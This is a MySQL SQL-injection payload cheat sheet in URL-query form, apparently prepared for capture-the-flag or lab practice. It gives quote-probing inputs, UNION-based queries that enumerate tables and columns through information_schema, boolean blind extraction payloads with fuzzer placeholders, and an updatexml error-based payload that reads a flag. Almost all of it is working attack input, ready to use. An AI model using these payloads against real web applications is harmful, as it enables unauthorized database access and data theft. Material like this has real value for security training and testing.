MySQL — SQL-injection payload notes (URL-query form; `%23` = `#`, `%20`/`+` = space)
-- Quote / bracket probing: try each closer and watch for a DB error or a changed page,
-- which tells you how the original query wraps the value (bare, 'quoted', "quoted", or inside parentheses)
?id=1'
?id=1"
?id=''
?id=""
?id=")
?id=')
-- Numeric-context check: if id=3-1 returns the same page as id=2, the value is used unquoted
?id=3-1
%20   -- URL-encoded space (use when the target strips or blocks literal spaces)
%23   -- URL-encoded '#', a MySQL end-of-line comment; used to discard the rest of the original query
limit 1,1   -- LIMIT offset,count: second row only
limit 0,1   -- first row only (step the offset to walk rows one at a time)
database()                                 -- name of the current schema
substr([str], [start], [length])           -- 1-based start; used to read one character per request in blind injection
substring()                                -- same as substr()
concat(str1, str2, ...)                    -- note: returns NULL if any argument is NULL
  e.g.: concat(username, 0x7e, password)   -- 0x7e is '~', a visible separator between the two fields
group_concat()                             -- collapse many rows into one comma-separated string (fits a single output column)
mid([column name], start, [length])        -- alias of substr()
updatexml([document], [XPath], [value])    -- an invalid XPath is echoed back in the error message (error-based extraction, see last payload)
  e.g.: information_schema.tables          -- metadata table listing every table (table_schema, table_name)
-- Union-based extraction. First find the column count (raise the ORDER BY index until it errors), then match it in the UNION:
id='1' order by 3
id='2' and 1=2 union select 1,2,database()
id='3' and 1=2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()
id='4' and 1=2 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database()
id='5' and 1=2 union select 1,2,[column name] from [table name]
-- Boolean-based blind extraction. '+' is the URL-encoded space; $1$ and $a$/$f$ mark the position and
-- character to iterate over (e.g. with an intruder/fuzzer), comparing the true/false page each time:
name=admin'+and+if(length(database())=[number],true,false)%23
name=admin'+and+substr(database(),$1$,1)='$f$'%23
name=admin'+AND+substr((SELECT+group_concat(table_name)+FROM+information_schema.tables+WHERE+table_schema=database()),$1$,1)='$a$'%23
name=admin'+AND+substr((SELECT+group_concat(column_name)+FROM+information_schema.columns+WHERE+table_schema=database()),$1$,1)='$a$'%23
name=admin'+AND+substr((SELECT+group_concat([column name])+FROM+[table name]),1,1)='a'%23
-- Error-based extraction: the '~' prefix makes the XPath invalid, so MySQL echoes the selected value in the error text.
-- The XPath error message is truncated (about 32 chars), so long values must be read in pieces with substr():
name=admin'+or+updatexml(1,concat(0x7e,(select+flag+from+fl4g)),1)%23